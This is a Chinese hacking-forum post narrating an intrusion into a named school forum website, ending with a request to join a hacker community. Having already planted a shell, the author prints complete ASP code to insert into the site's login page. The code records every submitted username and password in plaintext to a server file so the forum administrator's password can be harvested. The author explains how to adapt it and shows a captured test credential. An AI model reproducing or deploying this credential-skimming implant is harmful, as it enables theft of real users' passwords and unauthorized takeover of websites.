————————————————————————————
先做广告吧.
黑客动画吧，不错的网站....
www.hack58.com
————————————————————————————
         当入侵陷入绝境中无奈的一种选择
本文提供的仅仅是一种思路，陷入绝境时可以用一下。
由于某些原因，想入侵这个网站。http://xdjx.nnsky.com/
探测结果：
主站可以注入，但只能得到论坛前台密码，无用。
有个ewebeditor，可下数据库，但无法破解得到管理密码，无用。
bbsxp的论坛，没有什么明显的漏洞了。所以就这么一直搁着。直到有一天浏览其他网站时，都是同一个学校的。
版主：雨中阳
  加为好友  发送讯息
 用户等级 管理员
同一个人，呵呵。有希望了。我们可以入侵这个论坛，得到他的密码。shell已经得到了。
但通过查看数据库，发现雨中阳 的密码比较变态，没办法了吗？
无奈，既然这样，既然他是斑竹，那他一定要经常登陆论坛了，所以我们可以在login.asp中插入代码，得到他的明文。
我已经查入好了。就是下面这段。

<%
dim fso
dim file
dim file2
dim filesize
dim file3
set fso=server.createobject("s cripting.FileSystemObject")
If Request("u")="del" Then
set file=fso.OpenTextFile("D:\web\union\shetuan\bbs\info.txt",2,True)
file.WriteLine ""
End If
If fso.FileExists("D:\web\union\shetuan\bbs\info.txt") Then
set file=fso.OpenTextFile("D:\web\union\shetuan\bbs\info.txt",8,True)
Else
set file=fso.CreateTextFile("D:\web\union\shetuan\bbs\info.txt")
end if
file.WriteLine "username:"+Request.form("username")
file.WriteLine "password:"+Request.form("password")
file.close
set file3=fso.GetFile("D:\web\union\shetuan\bbs\info.txt")
filesize=file3.size
if filesize>200000 then
set file2=fso.OpenTextFile("D:\web\union\shetuan\bbs\info.txt",2,True)
file2.WriteLine ""
file2.close
end if

set file=nothing
set file2=nothing
set filesize=nothing
set fso=nothing
%>
就是这段，其中两点注意：
D:\web\union\shetuan\bbs，你自己的路径
file.WriteLine "username:"+Request.form("username")
file.WriteLine "password:"+Request.form("password")
username,password,也要看你自己的情况。
我已经插入好了 。实验一下。什么也没有呢。
我还下载呢，卡~
我们实验下，卡啊

username:tiandi
password:00123456

，好成功了，我们现在要做的就是等他登陆了。
你也可以去他的网站去刺激下他啊。呵呵，这就不演示了。

——————————————————————
希望黑吧管理员可以给我个邀请码，很希望在黑吧学习，
我的邮箱:shixiemodi@163.com
谢谢。
————————————————————————